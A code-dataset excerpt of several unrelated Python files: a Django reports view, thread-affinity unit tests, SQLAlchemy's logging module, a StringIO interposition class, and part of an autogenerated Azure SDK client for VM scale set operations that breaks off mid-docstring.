text
stringlengths 2
999k
|
|---|
"""Reports views"""
# Django
from django.views.generic import TemplateView
# Shortcuts
from django.shortcuts import render
from django.shortcuts import redirect, reverse, get_object_or_404
from django.contrib.auth import authenticate
from django.http import (
HttpResponse,
HttpResponseNotFound,
HttpResponseServerError,
HttpResponseRedirect,
)
# Rest framework
from rest_framework.views import APIView
from rest_framework import status
from rest_framework.permissions import (
IsAuthenticated,
IsAdminUser,
)
from rest_framework.authentication import SessionAuthentication, BasicAuthentication
# Menus
from ...incubator.helpers.helperDictionaries import getReportsIndexMenus, getReportIndexAnalytics
class ReportsIndex(TemplateView):
template_name = 'gepiandashboard/pages/reports_index.html'
context = {}
def get(self, request):
if not request.user.is_authenticated:
return render(request, 'errors/401.html')
self.context['menus'] = getReportsIndexMenus()
self.context['analytics'] = getReportIndexAnalytics()
return render(request, self.template_name, self.context)
|
import unittest
import random
import subprocess
import signal
import sys
import os
import thread_affinity
# Test results may vary if executed in different systems
# with different amount of CPUUs
def get_random_mask():
"""Return a random, valid affinity mask
Which is a subset of {0, 1, ..., 2 ** num_procs - 1}
"""
num_procs = thread_affinity.get_nprocs()
r = random.randint(1, 2 ** num_procs)
return [i for i in range(num_procs) if (r & (1 << i))]
class TestThreadAffinityLibrary(unittest.TestCase):
"""Test basic Thread Affinity features.
"""
def test_set_get_affinity(self):
"""Test if a simple set & get works
"""
random.seed(1)
proc_list = get_random_mask()
thread_affinity.setaffinity(proc_list)
self.assertEqual(proc_list, thread_affinity.get_affinity())
def test_set_get_incorrect_affinity(self):
"""Test if the program sets the default affinity in case of illegal masks
"""
illegal_mask = [-1]
default_affinity = thread_affinity.get_default_affinity()
thread_affinity.setaffinity(illegal_mask)
self.assertEqual(default_affinity, thread_affinity.get_affinity())
def test_set_get_affinity_subprocess(self):
"""Test if the affinity of a subprocess can be controlled from above
"""
random.seed(3)
proc_list = get_random_mask()
import subprocess
proc = subprocess.Popen(["python", "-c", "while True: pass"])
thread_affinity.set_affinity(proc_list, proc.pid)
self.assertEqual(proc_list, thread_affinity.get_affinity(proc.pid))
proc.send_signal(signal.SIGKILL)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestThreadAffinityLibrary)
unittest.TextTestRunner(verbosity = 2).run(suite)
|
# sqlalchemy/log.py
# Copyright (C) 2006-2022 the SQLAlchemy authors and contributors
# <see AUTHORS file>
# Includes alterations by Vinay Sajip vinay_sajip@yahoo.co.uk
#
# This module is part of SQLAlchemy and is released under
# the MIT License: https://www.opensource.org/licenses/mit-license.php
"""Logging control and utilities.
Control of logging for SA can be performed from the regular python logging
module. The regular dotted module namespace is used, starting at
'sqlalchemy'. For class-level logging, the class name is appended.
The "echo" keyword parameter, available on SQLA :class:`_engine.Engine`
and :class:`_pool.Pool` objects, corresponds to a logger specific to that
instance only.
"""
from __future__ import annotations
import logging
import sys
from typing import Any
from typing import Optional
from typing import overload
from typing import Set
from typing import Type
from typing import TypeVar
from typing import Union
from .util import py311
from .util import py38
from .util.typing import Literal
if py38:
STACKLEVEL = True
# needed as of py3.11.0b1
# #8019
STACKLEVEL_OFFSET = 2 if py311 else 1
else:
STACKLEVEL = False
STACKLEVEL_OFFSET = 0
_IT = TypeVar("_IT", bound="Identified")
_EchoFlagType = Union[None, bool, Literal["debug"]]
# set initial level to WARN. This so that
# log statements don't occur in the absence of explicit
# logging being enabled for 'sqlalchemy'.
rootlogger = logging.getLogger("sqlalchemy")
if rootlogger.level == logging.NOTSET:
rootlogger.setLevel(logging.WARN)
def _add_default_handler(logger: logging.Logger) -> None:
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(
logging.Formatter("%(asctime)s %(levelname)s %(name)s %(message)s")
)
logger.addHandler(handler)
_logged_classes: Set[Type["Identified"]] = set()
def _qual_logger_name_for_cls(cls: Type["Identified"]) -> str:
return (
getattr(cls, "_sqla_logger_namespace", None)
or cls.__module__ + "." + cls.__name__
)
def class_logger(cls: Type[_IT]) -> Type[_IT]:
logger = logging.getLogger(_qual_logger_name_for_cls(cls))
cls._should_log_debug = lambda self: logger.isEnabledFor( # type: ignore[assignment] # noqa: E501
logging.DEBUG
)
cls._should_log_info = lambda self: logger.isEnabledFor( # type: ignore[assignment] # noqa: E501
logging.INFO
)
cls.logger = logger
_logged_classes.add(cls)
return cls
_IdentifiedLoggerType = Union[logging.Logger, "InstanceLogger"]
class Identified:
__slots__ = ()
logging_name: Optional[str] = None
logger: _IdentifiedLoggerType
_echo: _EchoFlagType
def _should_log_debug(self) -> bool:
return self.logger.isEnabledFor(logging.DEBUG)
def _should_log_info(self) -> bool:
return self.logger.isEnabledFor(logging.INFO)
class InstanceLogger:
"""A logger adapter (wrapper) for :class:`.Identified` subclasses.
This allows multiple instances (e.g. Engine or Pool instances)
to share a logger, but have its verbosity controlled on a
per-instance basis.
The basic functionality is to return a logging level
which is based on an instance's echo setting.
Default implementation is:
'debug' -> logging.DEBUG
True -> logging.INFO
False -> Effective level of underlying logger (
logging.WARNING by default)
None -> same as False
"""
# Map echo settings to logger levels
_echo_map = {
None: logging.NOTSET,
False: logging.NOTSET,
True: logging.INFO,
"debug": logging.DEBUG,
}
_echo: _EchoFlagType
__slots__ = ("echo", "logger")
def __init__(self, echo: _EchoFlagType, name: str):
self.echo = echo
self.logger = logging.getLogger(name)
# if echo flag is enabled and no handlers,
# add a handler to the list
if self._echo_map[echo] <= logging.INFO and not self.logger.handlers:
_add_default_handler(self.logger)
#
# Boilerplate convenience methods
#
def debug(self, msg: str, *args: Any, **kwargs: Any) -> None:
"""Delegate a debug call to the underlying logger."""
self.log(logging.DEBUG, msg, *args, **kwargs)
def info(self, msg: str, *args: Any, **kwargs: Any) -> None:
"""Delegate an info call to the underlying logger."""
self.log(logging.INFO, msg, *args, **kwargs)
def warning(self, msg: str, *args: Any, **kwargs: Any) -> None:
"""Delegate a warning call to the underlying logger."""
self.log(logging.WARNING, msg, *args, **kwargs)
warn = warning
def error(self, msg: str, *args: Any, **kwargs: Any) -> None:
"""
Delegate an error call to the underlying logger.
"""
self.log(logging.ERROR, msg, *args, **kwargs)
def exception(self, msg: str, *args: Any, **kwargs: Any) -> None:
"""Delegate an exception call to the underlying logger."""
kwargs["exc_info"] = 1
self.log(logging.ERROR, msg, *args, **kwargs)
def critical(self, msg: str, *args: Any, **kwargs: Any) -> None:
"""Delegate a critical call to the underlying logger."""
self.log(logging.CRITICAL, msg, *args, **kwargs)
def log(self, level: int, msg: str, *args: Any, **kwargs: Any) -> None:
"""Delegate a log call to the underlying logger.
The level here is determined by the echo
flag as well as that of the underlying logger, and
logger._log() is called directly.
"""
# inline the logic from isEnabledFor(),
# getEffectiveLevel(), to avoid overhead.
if self.logger.manager.disable >= level:
return
selected_level = self._echo_map[self.echo]
if selected_level == logging.NOTSET:
selected_level = self.logger.getEffectiveLevel()
if level >= selected_level:
if STACKLEVEL:
kwargs["stacklevel"] = (
kwargs.get("stacklevel", 1) + STACKLEVEL_OFFSET
)
self.logger._log(level, msg, args, **kwargs)
def isEnabledFor(self, level: int) -> bool:
"""Is this logger enabled for level 'level'?"""
if self.logger.manager.disable >= level:
return False
return level >= self.getEffectiveLevel()
def getEffectiveLevel(self) -> int:
"""What's the effective level for this logger?"""
level = self._echo_map[self.echo]
if level == logging.NOTSET:
level = self.logger.getEffectiveLevel()
return level
def instance_logger(
instance: Identified, echoflag: _EchoFlagType = None
) -> None:
"""create a logger for an instance that implements :class:`.Identified`."""
if instance.logging_name:
name = "%s.%s" % (
_qual_logger_name_for_cls(instance.__class__),
instance.logging_name,
)
else:
name = _qual_logger_name_for_cls(instance.__class__)
instance._echo = echoflag # type: ignore
logger: Union[logging.Logger, InstanceLogger]
if echoflag in (False, None):
# if no echo setting or False, return a Logger directly,
# avoiding overhead of filtering
logger = logging.getLogger(name)
else:
# if a specified echo flag, return an EchoLogger,
# which checks the flag, overrides normal log
# levels by calling logger._log()
logger = InstanceLogger(echoflag, name)
instance.logger = logger # type: ignore
class echo_property:
__doc__ = """\
When ``True``, enable log output for this element.
This has the effect of setting the Python logging level for the namespace
of this element's class and object reference. A value of boolean ``True``
indicates that the loglevel ``logging.INFO`` will be set for the logger,
whereas the string value ``debug`` will set the loglevel to
``logging.DEBUG``.
"""
@overload
def __get__(
self, instance: Literal[None], owner: Type[Identified]
) -> echo_property:
...
@overload
def __get__(
self, instance: Identified, owner: Type[Identified]
) -> _EchoFlagType:
...
def __get__(
self, instance: Optional[Identified], owner: Type[Identified]
) -> Union[echo_property, _EchoFlagType]:
if instance is None:
return self
else:
return instance._echo
def __set__(self, instance: Identified, value: _EchoFlagType) -> None:
instance_logger(instance, echoflag=value)
|
"""
Stream IO interposition
"""
import io
class InterposedStringIO(io.StringIO):
def __init__(self, newline="\n", line_buffering = False, onflush=None):
super().__init__(newline=newline)
self._line_buffering = line_buffering
self._onflush = onflush
def flush(self):
s = self.getvalue()
self.seek(io.SEEK_SET, 0)
self.truncate()
if self._onflush:
self._onflush(s)
def write(self, s):
super().write(s)
if self._line_buffering and ('\n' in s or '\r' in s):
self.flush()
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._virtual_machine_scale_set_vms_operations import build_deallocate_request_initial, build_delete_request_initial, build_get_instance_view_request, build_get_request, build_list_request, build_power_off_request_initial, build_reimage_all_request_initial, build_reimage_request_initial, build_restart_request_initial, build_start_request_initial
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class VirtualMachineScaleSetVMsOperations:
"""VirtualMachineScaleSetVMsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.compute.v2017_03_30.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _reimage_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.OperationStatusResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_reimage_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._reimage_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_reimage_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/reimage'} # type: ignore
@distributed_trace_async
async def begin_reimage(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
"""Reimages (upgrade the operating system) a specific virtual machine in a VM scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.OperationStatusResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._reimage_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_reimage.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/reimage'} # type: ignore
async def _reimage_all_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.OperationStatusResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_reimage_all_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._reimage_all_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_reimage_all_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/reimageall'} # type: ignore
@distributed_trace_async
async def begin_reimage_all(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
"""Allows you to re-image all the disks ( including data disks ) in the a VM scale set instance.
This operation is only supported for managed disks.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.OperationStatusResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._reimage_all_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_reimage_all.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/reimageall'} # type: ignore
async def _deallocate_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.OperationStatusResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_deallocate_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._deallocate_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_deallocate_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/deallocate'} # type: ignore
@distributed_trace_async
async def begin_deallocate(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
"""Deallocates a specific virtual machine in a VM scale set. Shuts down the virtual machine and
releases the compute resources it uses. You are not billed for the compute resources of this
virtual machine once it is deallocated.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.OperationStatusResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._deallocate_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_deallocate.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/deallocate'} # type: ignore
async def _delete_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.OperationStatusResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._delete_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}'} # type: ignore
@distributed_trace_async
async def begin_delete(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
"""Deletes a virtual machine from a VM scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.OperationStatusResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}'} # type: ignore
@distributed_trace_async
async def get(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> "_models.VirtualMachineScaleSetVM":
"""Gets a virtual machine from a VM scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualMachineScaleSetVM, or the result of cls(response)
:rtype: ~azure.mgmt.compute.v2017_03_30.models.VirtualMachineScaleSetVM
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualMachineScaleSetVM"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualMachineScaleSetVM', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}'} # type: ignore
@distributed_trace_async
async def get_instance_view(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> "_models.VirtualMachineScaleSetVMInstanceView":
"""Gets the status of a virtual machine from a VM scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualMachineScaleSetVMInstanceView, or the result of cls(response)
:rtype: ~azure.mgmt.compute.v2017_03_30.models.VirtualMachineScaleSetVMInstanceView
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualMachineScaleSetVMInstanceView"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_instance_view_request(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self.get_instance_view.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualMachineScaleSetVMInstanceView', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_instance_view.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/instanceView'} # type: ignore
@distributed_trace
def list(
self,
resource_group_name: str,
virtual_machine_scale_set_name: str,
filter: Optional[str] = None,
select: Optional[str] = None,
expand: Optional[str] = None,
**kwargs: Any
) -> AsyncIterable["_models.VirtualMachineScaleSetVMListResult"]:
"""Gets a list of all virtual machines in a VM scale sets.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the VM scale set.
:type virtual_machine_scale_set_name: str
:param filter: The filter to apply to the operation. Allowed values are
'startswith(instanceView/statuses/code, 'PowerState') eq true', 'properties/latestModelApplied
eq true', 'properties/latestModelApplied eq false'.
:type filter: str
:param select: The list parameters. Allowed values are 'instanceView', 'instanceView/statuses'.
:type select: str
:param expand: The expand expression to apply to the operation. Allowed values are
'instanceView'.
